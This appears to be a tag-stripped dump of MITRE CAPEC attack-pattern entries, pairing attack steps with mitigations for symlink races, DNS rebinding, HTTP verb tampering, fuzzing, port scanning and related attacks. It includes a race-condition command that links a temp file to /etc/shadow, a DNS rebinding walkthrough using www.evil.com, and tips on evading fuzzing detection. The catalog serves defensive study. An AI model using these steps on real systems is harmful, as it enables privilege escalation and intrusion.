The attacker injects, manipulates, deletes, or forges malicious log entries into the log file, in an attempt to mislead an audit of the log file or cover tracks of an attack. Due to either insufficient access controls of the log files or the logging mechanism, the attacker is able to perform such actions.
The target host is logging the action and data of the user.
The target host insufficiently protects access to the logs or logging mechanisms.
The attacker must understand how the logging mechanism works.
Optionally, the attacker must know the location and the format of individual entries of the log files.
1000
Category
ChildOf
262
CAPEC Content Team
The MITRE Corporation
2014-06-23
1000
Attack Pattern
CanAlsoBe
203
CAPEC Content Team
The MITRE Corporation
2014-06-23
This attack leverages the use of symbolic links (Symlinks) in order to write to sensitive files. An attacker can create a Symlink link to a target file not otherwise accessible to her. When the privileged program tries to create a temporary file with the same name as the Symlink link, it will actually write to the target file pointed to by the attackers' Symlink link. If the attacker can insert malicious content in the temporary file she will be writing to the sensitive file by using the Symlink. The race occurs because the system checks if the temporary file exists, then creates the file. The attacker would typically create the Symlink during the interval between the check and the creation of the temporary file.
Verify that target host's platform supports symbolic links.
This attack pattern is only applicable on platforms that support symbolic links.
Research target platform to determine whether it supports symbolic links.
env-Embedded env-Local
Create a symbolic link and ensure that it works as expected on the given platform.
env-Embedded env-Local
Target platform supports symbolic links (e.g. Linux, UNIX, etc.)
Target platform does not support symbolic links (e.g. MS Windows)
Examine application's file I/O behavior
Analyze the application's file I/O behavior to determine where it stores files, as well as the operations it performs to read/write files.
Use kernel tracing utility such as ktrace to monitor application behavior
env-Local
Use debugging utility such as File Monitor to monitor the application's filesystem I/O calls
env-Local
Watch temporary directories to see when temporary files are created, modified and deleted.
env-Embedded env-Local
Analyze source code for open-source systems like Linux, Apache, etc.
env-Embedded env-Local
Attacker can watch files being created, modified and/or deleted by application.
env-Embedded env-Local
Application does not seem to perform any filesystem I/O operations.
env-Embedded env-Local
Attacker identifies at least one reproducible file I/O operation performed by the application.
Attacker cannot identify any file I/O operations being performed by the application.
Verify ability to write to filesystem
The attacker verifies ability to write to the target host's file system.
Create a file that does not exist in the target directory (e.g. "touch temp.txt" in UNIX-like systems)
env-Embedded env-Local
On platforms that differentiate between file creation and file modification, if the target file that the application writes to already exists, attempt to modify it.
env-Embedded env-Local
Verify permissions on target directory
env-Embedded env-Local
Target directory is a globally writable temp directory (e.g. /tmp in many UNIX-like systems)
env-Embedded env-Local
Target directory is writable by the attackers' effective user ID.
env-Embedded env-Local
Attacker can create and modify files in the target directory.
Attacker cannot create or modify files in the target directory.
Store temporary files in a directory with limited permissions where malicious users cannot tamper with them.
Replace file with a symlink to a sensitive system file.
Between the time that the application checks to see if a file exists (or if the user has access to it) and the time the application actually opens the file, the attacker replaces the file with a symlink to a sensitive system file.
Create an infinite loop containing commands such as "rm -f tempfile.dat; ln -s /etc/shadow tempfile.dat". Wait for an instance where the following steps occur in the given order: (1) Application ensures that tempfile.dat exists and that the user has access to it, (2) "rm -f tempfile.dat; ln -s /etc/shadow tempfile.dat", and (3) Application opens tempfile.dat for writing, and inadvertently opens /etc/shadow for writing instead.
env-Embedded env-Local
Use other techniques with debugging tools to replace the file between the time the application checks the file and the time the application opens it.
env-Embedded env-Local
Sensitive file tampered with successfully.
Sensitive file could not be tampered with.
Use file handles to check existence of files, to check permissions and to open them. Do not use filename except to obtain a handle initially.
Drop application's permissions to the current user's permissions before performing any file I/O operations (e.g. using Process.as_uid() in Ruby).
Run application with minimal permissions. In particular, avoid running applications as root on UNIX-like systems and as Administrator on Windows systems.
The attacker is able to create Symlink links on the target host.
Tainted data from the attacker is used and copied to temporary files.
The target host does insecure temporary file creation.
High
Medium
Injection
Time and State
Modification of Resources
In this naive example, the Unix program foo is setuid. Its function is to retrieve information for the accounts specified by the user. For "efficiency," it sorts the requested accounts into a temporary file (/tmp/foo naturally) before making the queries.
The directory /tmp is world-writable. Malicious user Mallory creates a symbolic link to the file /.rhosts named /tmp/foo. Then, she invokes foo with + + as the requested account. The program creates the (temporary) file /tmp/foo (really creating /.rhosts) and puts the requested account (+ +) in it. It removes the temporary file (merely removing the symbolic link).
Now the /.rhosts contains + +, which is the incantation necessary to allow anyone to use rlogin to log into the computer as the superuser.
[R.27.1]
GNU ed before 0.3 allows local users to overwrite arbitrary files via a symlink attack on temporary files, possibly in the open_sbuf function.
CVE-2006-6939
OpenmosixCollector and OpenMosixView in OpenMosixView 1.5 allow local users to overwrite or delete arbitrary files via a symlink attack on (1) temporary files in the openmosixcollector directory or (2) nodes.tmp.
CVE-2005-0894
Setuid product allows file reading by replacing a file being edited with a symlink to the targeted file, leaking the result in error messages when parsing fails.
CVE-2000-0972
Medium
This attack is sophisticated because the attacker has to overcome a few challenges such as creating symlinks on the target host during a precise timing, inserting malicious data in the temporary file and have knowledge about the temporary files created (file name and function which creates them).
The attacker will certainly look for file system locations where he can write and create Symlink links.
The attacker may also observe the system and locate the temporary files created during a call to a certain function.
Use safe libraries when creating temporary files. For instance the standard library function mkstemp can be used to safely create temporary files. For shell scripts, the system utility mktemp does the same thing.
Access to the directories should be restricted as to prevent attackers from manipulating the files. Denying access to a file can prevent an attacker from replacing that file with a link to a sensitive file.
Follow the principle of least privilege when assigning access rights to files.
Ensure good compartmentalization in the system to provide protected areas that can be trusted.
Integrity
Modify application data
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Availability
DoS: resource consumption (other)
Denial of Service
The content of the temporary file which is copied to the file pointed to by the Symlink.
The content of the file overwritten when writing to the Symlink.
The new content of the targeted file.
This attack can cause privilege escalation, modification of resources or denial of services.
367
Targeted
61
Targeted
662
Targeted
689
Targeted
667
Targeted
1000
Attack Pattern
ChildOf
29
1000
Attack Pattern
ChildOf
26
Least Privilege
Exploitation
High
High
Low
All
All
All
All
Wikipedia
Symlink race
The Wikimedia Foundation, Inc
http://en.wikipedia.org/wiki/Symlink_race
mkstemp
IEEE Std 1003.1, 2004 Edition
The Open Group Base Specifications Issue 6
http://www.opengroup.org/onlinepubs/009695399/functions/mkstemp.html
CAPEC Content Team
The MITRE Corporation
2014-06-23
An adversary adds a new entry to run keys in the registry in an attempt to automatically execute a desired application.
1000
Attack Pattern
ChildOf
203
CAPEC Content Team
The MITRE Corporation
2014-06-23
1000
Category
ChildOf
262
CAPEC Content Team
The MITRE Corporation
2014-06-23
An adversary subverts a communications protocol to perform an attack. This type of attack can allow an adversary to impersonate others, discover sensitive information, control the outcome of a session, or perform other attacks. This type of attack targets invalid assumptions that may be inherent in implementers of the protocol, incorrect implementations of the protocol, or vulnerabilities in the protocol itself.
The protocol or implementations thereof must contain bugs that an adversary can exploit.
Medium
In some variants of this attack the adversary must be able to intercept communications using the protocol. This means they need to be able to receive the communications from one participant and prevent the other participant from receiving these communications.
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker injects content into a server response that is interpreted differently by intermediaries than it is by the target browser. To do this, it takes advantage of inconsistent or incorrect interpretations of the HTTP protocol by various applications. For example, it might use different block terminating characters (CR or LF alone), adding duplicate header fields that browsers interpret as belonging to separate responses, or other techniques. Consequences of this attack can include response-splitting, cross-site scripting, apparent defacement of targeted sites, cache poisoning, or similar actions.
The targeted server must allow the attacker to insert content that will appear in the server's response.
Medium
No special resources are needed for this attack.
Design: Employ strict adherence to interpretations of HTTP messages wherever possible.
Implementation: Encode header information provided by user input so that user-supplied content is not interpreted by intermediaries.
74
Secondary
436
Targeted
1000
Attack Pattern
ChildOf
220
1000
Attack Pattern
PeerOf
33
333
Category
HasMember
360
HTTP Response Smuggling
Beyond Security
http://www.securiteam.com/securityreviews/5CP0L0AHPC.html
WASC Threat Classification 2.0
WASC-27 - HTTP Response Smuggling
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/HTTP-Response-Smuggling
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker modifies the HTTP Verb (e.g. GET, PUT, TRACE, etc.) in order to bypass access restrictions. Some web environments allow administrators to restrict access based on the HTTP Verb used with requests. However, attackers can often provide a different HTTP Verb, or even provide a random string as a verb in order to bypass these protections. This allows the attacker to access data that should otherwise be protected.
The targeted system must attempt to filter access based on the HTTP verb used in requests.
Medium
The attacker requires a tool that allows them to manually control the HTTP verb used to send messages to the targeted server.
Design: Ensure that only legitimate HTTP verbs are allowed.
Design: Do not use HTTP verbs as factors in access decisions.
302
Targeted
654
Secondary
1000
Attack Pattern
ChildOf
220
Arshan Dabirsiaghi
Bypassing Web Authentication and Authorization with HTTP Verb Tampering: How to inadvertently allow attackers full access to your web application
Aspect Security
http://mirror.transact.net.au/sourceforge/w/project/wa/waspap/waspap/Core/Bypassing_VBAAC_with_HTTP_Verb_Tampering.pdf
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker serves content whose IP address is resolved by a DNS server that it controls and after initial contact by a web browser or similar client it changes the IP address to which its name resolves to an address within the target browser's organization that is not publicly accessible, thus allowing the web browser to examine this internal address on its behalf. Web browsers enforce security zones based on DNS names in order to prevent cross-zone disclosure of information. In a DNS binding attack an attacker publishes content on their own server with their own name and DNS server. The first time the target accesses the attackers' content, the attackers' name must be resolved to an IP address. The attacker's DNS server performs this resolution, providing a short Time-To-Live (TTL) in order to prevent the target from caching the value. When the target makes a subsequent request to the attackers' content the attackers' DNS server must again be queried, but this time the DNS server returns an address internal to the target's organization that would not be accessible from an outside source. Because the same name resolves to both these IP addresses, browsers will place both IP addresses in the same security zone and allow information to flow between the addresses. The attacker can then use scripts in the content the target retrieved from the attacker in the original message to exfiltrate data from the named internal addresses. This allows attackers to discover sensitive information about the internal network of an enterprise. If there is a trust relationship between the computer with the targeted browser and the internal machine the attacker identifies, additional attacks are possible. This attack differs from pharming attacks in that the attacker is the legitimate owner of the malicious DNS server and so does not need to compromise behavior of external DNS services.
Identify potential DNS rebinding targets
An attacker publishes content on their own server with their own name and DNS server. Attract HTTP traffic and explore rebinding vulnerabilities in browsers, flash players of old version.
Attacker uses Web advertisements to attract the victim to access attacker's DNS. Explore the versions of web browser or flash players in HTTP request.
env-All
Old versions that have DNS rebinding vulnerabilities.
env-All
New versions that have fixed DNS rebinding vulnerabilities.
env-All
A list of browser's information.
No browser's information in HTTP request.
Establish initial target access to attacker DNS
The first time the target accesses the attackers' content, the attackers' name must be resolved to an IP address. The attacker's DNS server performs this resolution, providing a short Time-To-Live (TTL) in order to prevent the target from caching the value.
The attacker finds some local active servers.
The attacker could not find any active local server.
Rebind DNS resolution to target address
the target makes a subsequent request to the attackers' content the attackers' DNS server must again be queried, but this time the DNS server returns an address internal to the target's organization that would not be accessible from an outside source.
Attacker rebinds victim's internal IP address of these servers with his server name.
Attacker fails to rebind victim's internal IP address of these servers with his server name.
Determine exploitability of DNS rebinding access to target address
The attacker can then use scripts in the content the target retrieved from the attacker in the original message to exfiltrate data from the named internal addresses.
The attacker's script is executed in victim's browser.
Malicious script is not executed in victim's browser, no HTTP request from the script.
Monitor external names resolving to internal addresses.
Prevent external names from resolving to internal addresses.
Access & exfiltrate data within the victim's security zone
The attacker can then use scripts in the content the target retrieved from the attacker in the original message to exfiltrate data from the internal addresses. This allows attackers to discover sensitive information about the internal network of an enterprise.
Attacker attempts to use victim's browser as an HTTP proxy to other resources inside the target's security zone. This allows two IP addresses placed in the same security zone.
env-Web
Attacker tries to scan and access all internal hosts in victim's local network by sending multiple short-lived IP addresses.
env-Web
Two IP addresses placed in the same security zone communicating each other.
Attacker can scan and access all internal hosts in victim's local network by sending multiple short-lived IP addresses.
Attacker fails to access internal server's information.
Update browser or flash players to the latest version.
Prevent external names from resolving to internal addresses.
The target browser must access content server from the attacker controlled DNS name. Web advertisements are often used for this purpose. The target browser must honor the TTL value returned by the attacker and re-resolve the attackers' DNS name after initial contact.
Very High
High
Protocol Manipulation
Injection
The attacker registers a domain name, such as www.evil.com with IP address 1.3.5.7, delegates it to his own DNS server (1.3.5.2), and uses phishing links or emails to get HTTP traffic. Instead of sending a normal TTL record, the DNS server sends a very short TTL record (for example, 1 second), preventing DNS response of entry[www.evil.com, 1.3.5.7] from being cached on victim's (192.168.1.10) browser. The attacker's server first responds to the victim with malicious script such as JavaScript, containing IP address (1.3.5.7) of the server. The attacker uses XMLHttpRequest (XHR) to send HTTP request or HTTPS request directly to the attackers' server and load response. The malicious script allows the attacker to rebind the host name to the IP address (192.168.1.2) of a target server that is behind the firewall. Then the server responds to attacker's real target, which is an internal host IP (192.168.1.2) in the same domain of the victim (192.168.1.10). Because the same name resolves to both these IP addresses, browsers will place both IP addresses (1.3.5.7 and 192.168.1.2) in the same security zone and allow information to flow between the addresses. Further, the attacker can achieve scanning and accessing all internal hosts in victim's local network (192.168.X.X). by sending multiple short-lived IP addresses.
Medium
Setup DNS server and attacker's web server. Write malicious script to allow victim to connect to web server.
The attacker must serve some web content that a victim accesses initially. This content must include executable content that queries the attackers' DNS name (to provide the second DNS resolution) and then performs the follow-on attack against the internal system. The attacker also requires a customized DNS server that serves an IP address for their registered DNS name, but which resolves subsequent requests by a single client to addresses internal to that client's network.
Design: IP Pinning causes browsers to record the IP address to which a given name resolves and continue using this address regardless of the TTL set in the DNS response. Unfortunately, this is incompatible with the design of some legitimate sites.
Implementation: Reject HTTP request with an malicious Host header
Implementation: Employ DNS resolvers that prevent external names from resolving to internal addresses.
Integrity
Modify files or directories
Confidentiality
Read files or directories
Integrity
Modify application data
Confidentiality
Read application data
Authorization
Execute unauthorized code or commands
Run Arbitrary Code
Accountability
Authentication
Authorization
Non-Repudiation
Gain privileges / assume identity
Access_Control
Authorization
Bypass protection mechanism
A vector specifically crafted to poison DNS cache, so that all traffic is redirected to an unintended destination.
DNS TTL record HTTP request with malicious DNS rebinds
Victim's browser and victim's local network
This attack allows attackers to discover sensitive information about the internal network of an enterprise. If there is a trust relationship between the computer with the targeted browser and the internal machine the attacker identifies, additional attacks are possible.
247
Targeted
1000
Attack Pattern
ChildOf
272
http://capec.mitre.org/data/definitions/272.html
Exploitation
Penetration
High
High
High
Client-Server
All
All
All
Collin Jackson
Adam Barth
Andrew Bortz
Weidong Shao
Dan Boneh
Protecting Browsers from DNS Rebinding Attacks
In Proceedings of ACM CCS 07
Wikipedia
DNS rebinding
The Wikimedia Foundation, Inc
http://en.wikipedia.org/wiki/DNS_rebinding
CAPEC Content Team
The MITRE Corporation
2014-06-23
1000
Attack Pattern
ChildOf
272
CAPEC Content Team
The MITRE Corporation
2014-06-23
1000
Attack Pattern
ChildOf
272
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker manipulates functions and/or their values used by web-related protocols to cause a web application or service to react differently that intended, allowing the attacker to gain access to data or resources normally restricted or to cause the application or service to crash. This can either be performed through the manipulation of call parameters with unexpected values or by calling functions that should normally be restricted or limited.
The targeted application or service must rely on web service protocols in such a way that malicious manipulation of them can subvert functionality.
The attacker must be able to manipulate the targeted application or service.
Design: Range, size and value and consistency verification for any arguments supplied to applications and services from external sources and devise appropriate error response.
Design: Ensure that function calls that should not be manipulated by a user are not accessible to them.
1000
Attack Pattern
ChildOf
272
CAPEC Content Team
The MITRE Corporation
2014-06-23
1000
Attack Pattern
ChildOf
278
CAPEC Content Team
The MITRE Corporation
2014-06-23
Fuzzing is a software testing method that feeds randomly constructed input to the system and looks for an indication that a failure in response to that input has occurred. Fuzzing treats the system as a black box and is totally free from any preconceptions or assumptions about the system.
An attacker can leverage fuzzing to try to identify weaknesses in the system. For instance fuzzing can help an attacker discover certain assumptions made in the system about user input. Fuzzing gives an attacker a quick way of potentially uncovering some of these assumptions without really knowing anything about the internals of the system. These assumptions can then be turned against the system by specially crafting user input that may allow an attacker to achieve his goals.
Observe communication and inputs
The fuzzing attacker observes the target system looking for inputs and communications between modules, subsystems, or systems.
Network sniffing. Using a network sniffer such as wireshark, the attacker observes communications into and out of the target system.
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Monitor API execution. Using a tool such as ktrace, strace, APISpy, or another debugging tool, the attacker observes the system calls and API calls that are made by the target system, and the nature of their parameters.
env-Local env-Embedded
Observe inputs using web inspection tools (OWASP's WebScarab, Paros, TamperData, TamperIE, etc.)
env-Web
The attacker creates a list of unique communications packets, messages, inputs, API calls or other actions the software takes.
Alert on promiscuous mode. Some network devices (switches, hubs) or monitoring stations (e.g., IDS) can detect and alert when a station in the network is passively eavesdropping.
Some production hardware (for embedded environments) can have debugging disabled on the hardware.
Techniques exist to insert no-ops and other null branches that thwart basic attempts to execute software stepwise in a debugger.
Generate fuzzed inputs
Given a fuzzing tool, a target input or protocol, and limits on time, complexity, and input variety, generate a list of inputs to try. Although fuzzing is random, it is not exhaustive. Parameters like length, composition, and how many variations to try are important to get the most cost-effective impact from the fuzzer.
Boundary cases. Generate fuzz inputs that attack boundary cases of protocol fields, inputs, or other communications limits. Examples include 0xff and 0x00 for single-byte inputs. In binary situations, approach each bit of an individual field with on and off (e.g., 0x80).
env-All
Attempt arguments to system calls or APIs. The variations include payloads that, if they were successful, could lead to a compromise on the system.
env-Local env-Embedded
Log unexpected parameters to API calls or system calls.
Profile the software's expected use of system calls. Use a sandboxing technique to restrict its API calls to the expected patterns.
SSL or other link-layer encryption techniques (VPN, 802.11x, etc.) can impair simple observation and require a would-be attacker to work much harder to get information about the operation of the software..
Observe the outcome
Observe the outputs to the inputs fed into the system by fuzzers and see if anything interesting happens. If failure occurs, determine why that happened. Figure out the underlying assumption that was invalidated by the input.
The software produces an indicator that the attacker can see (error message, altered error state in a protocol, etc.).
env-All
The previous step led to plausible, practical fuzz inputs.
env-All
If the software's indicators (error messages, etc.) vary clearly based on the attackers' input, then the attacker has a sufficient starting point for customizing his attack.
The attacker is unable to induce unexpected failures or output based fuzzed inputs.
Craft exploit payloads
Put specially crafted input into the system that leverages the weakness identified through fuzzing and allows to achieve the goals of the attacker. Fuzzers often reveal ways to slip through the input validation filters and introduce unwanted data into the system.
Identify and embed shell code for the target system.
env-All
Embed higher level attack commands in the payload. (e.g., SQL, PHP, server-side includes, etc.)
env-Web env-CommProtocol env-Peer2Peer env-ClientServer
Induce denial of service by exploiting resource leaks or bad error handling.
env-All
Monitor system logs and alert on unusual activity. Most shell code and unusual activity appears in logs.
Medium
High
Analysis
Injection
Brute Force
A fuzz test reveals that when data length for a particular field exceeds certain length, the input validation filter fails and lets the user data in unfiltered. This provides an attacker with an injection vector to deliver the malicious payload into the system.
Low
There is a wide variety of fuzzing tools available.
Fuzzing tools.
A lot of invalid data is fed to the system. Data that cannot have been generated through a legitimate transaction/request. Data is coming into the system within a short period of time and potentially from the same IP.
Take pauses between fuzzing attempts (may not be very practical). Spoof IP addresses so that it does not look like all data is coming from the same source.
Test to ensure that the software behaves as per specification and that there are no unintended side effects. Ensure that no assumptions about the validity of data are made.
Use fuzz testing during the software QA process to uncover any surprises, uncover any assumptions or unexpected behavior.
Integrity
Modify memory
Availability
Unexpected State
Confidentiality
Read application data
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Confidentiality
Integrity
Availability
Alter execution logic
74
Targeted
388
Targeted
20
Targeted
728
Secondary
1000
Category
ChildOf
223
Reconnaissance
Medium
Medium
Medium
All
All
All
All
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker sends a SOAP message where the field values are other than what the server is likely to expect in order to precipitate non-standard server behavior. In a SOAP message, parameters take the form of values within XML elements. The server will have an XML schema that indicates certain restrictions on these parameter values. For example, the server may expect a parameter to be a string with fewer than 10 characters, or a number less than 100. In a SOAP parameter tampering attack, an attacker either violates this schema, or takes advantage of flexibility within the scheme (for example, a lack of a character limit) to provide parameters that a server might not expect. Examples of unexpected parameters include oversized data, data with different data types, inserting metacharacters within data, and sending contextually inappropriate data (for example, sending a non-existent product name in a product name field or using an out-of-order sequence number). Results of this attack can include information disclosure, denial of service, or even execution of arbitrary code.
The targeted server either fails to verify that data in SOAP messages conforms to the appropriate XML schema, or it fails to correctly handle the complete range of data allowed by the schema.
Medium
The attacker must be able to craft arbitrary SOAP messages and send them to the targeted server.
1000
Attack Pattern
ChildOf
279
Navya Sidharth
Jigang Liu
Resistant SOAP Messaging with IAPF
Shreeraj Shah
Web 2.0 Security: Defending Ajax, RIA, and SOA
Chapter 12. SOA Attack Vectors and Scanning for Vulnerabilities: Parameter Tampering
Course Technology PTR
December 04, 2007
http://my.safaribooksonline.com/9781584505501/ch12lev1sec4
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker sends out an ICMP Type 8 Echo Request, commonly known as a 'Ping', in order to determine if a target system is responsive. If the request is not blocked by a firewall or ACL, the target host will respond with an ICMP Type 0 Echo Reply datagram. This type of exchange is usually referred to as a 'Ping' due to the Ping utility present in almost all operating systems. Ping, as commonly implemented, allows a user to test for alive hosts, measure round-trip time, and measure the percentage of packet loss. Performing this operation for a range of hosts on the network is known as a 'Ping Sweep'. While the Ping utility is useful for small-scale host discovery, it was not designed for rapid or efficient host discovery over large network blocks. Other scanning utilities have been created that make ICMP ping sweeps easier to perform. Most networks filter ingress ICMP Type 8 messages for security reasons. Various other methods of performing ping sweeps have developed as a result. It is important to recognize the key security goal of the attacker is to discover if an IP address is alive, or has a responsive host. To this end, virtually any type of ICMP message, as defined by RFC 792 is useful. An attacker can cycle through various types of ICMP messages to determine if holes exist in the firewall configuration. When ICMP ping sweeps fail to discover hosts, other protocols can be used for the same purpose, such as TCP SYN or ACK segments, UDP datagrams sent to closed ports, etc. The attackers goal is to discover as many potential targets as possible can utilize a wide range of techniques to achieve this end. ICMP pings have the following characteristics:
1. Host Discovery: Can be used to discover if a host is alive via ICMP Echo Reply Message
2. Effective Against: LANs or Internal IP address ranges where firewall or ACL rules are less restrictive
3. Weak Against: Firewalls properly configured to block ICMP Echo Request and Echo Replies.
4. Port State: Unable to determine the status of ports on a host.
Network Layer
Server-side
Host
RFC 792
Type
The ICMP Type Field determines the function of the ICMP query. A Type 8 message directs the target to reply to the sender of the echo request message with an echo reply message. In forming an echo reply the source and destination addresses are switched, the Type field is set to '0', any data contained in the data portion of the echo request is sent "echoed" back to the host, and the checksum is recalculated.
8
ICMP echo requests may contain arbitrary data as a payload. When the ICMP Type is 8 (echo request), the data received in the echo message must be returned in the echo reply message.
Uses Protocol
The ability to send an ICMP type 8 query (Echo Request) to a remote target and receive an ICMP type 0 message (ICMP Echo Reply) in response. Any firewalls or access control lists between the sender and receiver must allow ICMP Type 8 and ICMP Type 0 messages in order for a ping operation to succeed.
Low
Ability to send custom ICMP queries. This can be accomplished via the use of various scanners or utilities.
1000
Attack Pattern
ChildOf
292
Ping
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 2: Scanning, pp. 44-51
6th Edition
McGraw Hill
2009
J. Postel
RFC792 - Internet Control Messaging Protocol
Defense Advanced Research Projects Agency (DARPA)
September 1981
http://www.faqs.org/rfcs/rfc792.html
R. Braden, Ed.
RFC1122 - Requirements for Internet Hosts - Communication Layers
October 1989
http://www.faqs.org/rfcs/rfc1122.html
Mark Wolfgang
Host Discovery with Nmap
November 2002
http://nmap.org/docs/discovery.pdf
Gordon "Fyodor" Lyon
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning
Section 3.5.2 Ping Scan (-SP), pg. 58
3rd "Zero Day" Edition,
Insecure.com LLC, ISBN: 978-0-9799587-1-7
2008
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker uses a SYN scan to determine the status of ports on the remote target. SYN scanning is the most common type of port scanning that is used because of its enormous advantages and few drawbacks. As a result, novice attackers tend to overly rely on the SYN scan while performing system reconnaissance. As a scanning method the primary advantages of SYN scanning are its universality and speed. RFC 793 defines the required behavior of any TCP/IP device in that an incoming connection request begins with a SYN packet, which in turn must be followed by a SYN/ACK packet from the receiving service. For this reason, like TCP Connect scanning, SYN scanning works against any TCP stack. Unlike TCP Connect scanning, it is possible to scan thousands of ports per second using this method. This type of scanning is usually referred to as 'half-open' scanning because it does not complete the three-way handshake. The scanning rate is extremely fast because no time is wasted completing the handshake or tearing down the connection. TCP SYN scanning can also immediately detect 3 of the 4 important types of port status: open, closed, and filtered. When a SYN is sent to an open port and unfiltered port, a SYN/ACK will be generated. This technique allows an attacker to scan through stateful firewalls due to the common configuration that TCP SYN segments for a new connection will be allowed for almost any port. When a SYN packet is sent to a closed port a RST is generated, indicating the port is closed. When SYN scanning to a particular port generates no response, or when the request triggers ICMP Type 3 unreachable errors, the port is filtered. A TCP Connect scan has the following characteristics:
1. Speed: TCP SYN scanning is fast compared to other types of scans.
2. Stealth: TCP SYN scanning is stealthy and SYN scan detection is fraught with false positives.
3. Open Port: Detects that a port is open via a successful SYN/ACK to the SYN.
4. Closed Port: Detects that a port is closed via a successful RST to the SYN
5. Filtered Port: No response, or ICMP messages, indicates the presence of a filter.
6. Unfiltered Port: Cannot distinguish between a state-fully filtered port and an unfiltered port.
SYN scanning is fast and provides the attacker with a wealth of information. The primary drawback is that SYN scanning requires the ability to access "raw sockets" in order to create the packets. As a result, it is not possible to perform a SYN scan from some systems (Windows XP SP 2). On other systems (BSD, Linux) administrative privileges are required in order to write to the raw socket.
Transport Layer
Server-side
Host
Service
RFC 793
Flag
A TCP SYN "synchronize" flag is the first step in the procedures to establish new TCP connections. This control flag is used to initialize a three-way handshake. The logic of the Transmission Control Block (TCB) dictates that any host that receives a SYN packet to an open port must respond with a "SYN/ACK" packet in acknowledgement.
8
Any data in the payload portion of a TCP SYN packet is ignored for the purpose of establishing a connection.
Uses Protocol
This scan type is not possible with some operating systems (Windows XP SP 2). On Linux and Unix systems it requires root privileges to use raw sockets.
Low
The ability to send TCP SYN segments to a host during network reconnaissance. This can be achieved via the use of a network mapper or scanner, or via raw socket programming in a scripting language. Packet injection tools are also useful for this purpose. Depending upon the method used it may be necessary to sniff the network in order to see the response.
Confidentiality
"Varies by context"
Confidentiality
Access_Control
Authorization
Bypass protection mechanism
Hide activities
1000
Attack Pattern
ChildOf
300
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 2: Scanning, pg. 56
6th Edition
McGraw Hill
2009
Defense Advanced Research Projects Agency Information Processing Techniques Office
Information Sciences Institute University of Southern California
RFC793 - Transmission Control Protocol
Defense Advanced Research Projects Agency (DARPA)
September 1981
http://www.faqs.org/rfcs/rfc793.html
Gordon "Fyodor" Lyon
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning
Section 5.32 TCP SYN (Stealth) Scan, pg. 100
3rd "Zero Day" Edition,
Insecure.com LLC, ISBN: 978-0-9799587-1-7
2008
Gordon "Fyodor" Lyon
The Art of Port Scanning
Volume: 7, Issue. 51
Phrack Magazine
1997
http://www.phrack.org/issues.html?issue=51&id=11#article
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker sends out an ICMP Type 8 Echo Request, commonly known as a 'Ping', in order to determine if a target system is responsive. If the request is not blocked by a firewall or ACL, the target host will respond with an ICMP Type 0 Echo Reply datagram. This type of exchange is usually referred to as a 'Ping' due to the Ping utility present in almost all operating systems. Ping, as commonly implemented, allows a user to test for alive hosts, measure round-trip time, and measure the percentage of packet loss. Performing this operation for a range of hosts on the network is known as a 'Ping Sweep'. While the Ping utility is useful for small-scale host discovery, it was not designed for rapid or efficient host discovery over large network blocks. Other scanning utilities have been created that make ICMP ping sweeps easier to perform. Most networks filter ingress ICMP Type 8 messages for security reasons. Various other methods of performing ping sweeps have developed as a result. It is important to recognize the key security goal of the attacker is to discover if an IP address is alive, or has a responsive host. To this end, virtually any type of ICMP message, as defined by RFC 792 is useful. An attacker can cycle through various types of ICMP messages to determine if holes exist in the firewall configuration. When ICMP ping sweeps fail to discover hosts, other protocols can be used for the same purpose, such as TCP SYN or ACK segments, UDP datagrams sent to closed ports, etc. The attackers goal is to discover as many potential targets as possible can utilize a wide range of techniques to achieve this end. ICMP pings have the following characteristics:
Low
1000
Attack Pattern
CanAlsoBe
285
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 2: Scanning, pp. 44-51
6th Edition
McGraw Hill
2009
J. Postel
RFC792 - Internet Control Messaging Protocol
Defense Advanced Research Projects Agency (DARPA)
September 1981
http://www.faqs.org/rfcs/rfc792.html
R. Braden, Ed.
RFC1122 - Requirements for Internet Hosts - Communication Layers
October 1989
http://www.faqs.org/rfcs/rfc1122.html
Mark Wolfgang
Host Discovery with Nmap
November 2002
http://nmap.org/docs/discovery.pdf
Gordon "Fyodor" Lyon
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning
Section 3.5.2 Ping Scan (-SP), pg. 58
3rd "Zero Day" Edition,
Insecure.com LLC, ISBN: 978-0-9799587-1-7
2008
CAPEC Content Team
The MITRE Corporation
2014-06-23
"Infrastructure-based footprinting involves interacting with available network or application resources for the purpose of gathering information about the architecture, topology, configuration, or potential vulnerabilities and exposures of a target networking infrastructure."
Network Layer
Transport Layer
Server-side
Network
Host
Service
Low
Confidentiality
"Varies by context"
Confidentiality
Access_Control
Authorization
Bypass protection mechanism
Hide activities
1000
Attack Pattern
CanAlsoBe
169
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 2: Scanning, pp. 38-39
6th Edition
McGraw Hill
2009
CAPEC Content Team
The MITRE Corporation
2014-06-23
This attack targets a race condition occurring between the time of check (state) for a resource and the time of use of a resource. The typical example is the file access. The attacker can leverage a file access race condition by "running the race", meaning that he would modify the resource between the first time the target program accesses the file and the time the target program uses the file. During that period of time, the attacker could do something such as replace the file and cause an escalation of privilege.
The attacker explores to gauge what level of access he has.
The attacker confirms access to a resource on the target host. The attacker confirms ability to modify the targeted resource.
The attacker decides to leverage the race condition by "running the race", meaning that he would modify the resource between the first time the target program accesses the file and the time the target program uses the file. During that period of time, the attacker can replace the resource and cause an escalation of privilege.
A resource is access/modified concurrently by multiple processes.
The attacker is able to modify resource.
A race condition exists while accessing a resource.
High
High
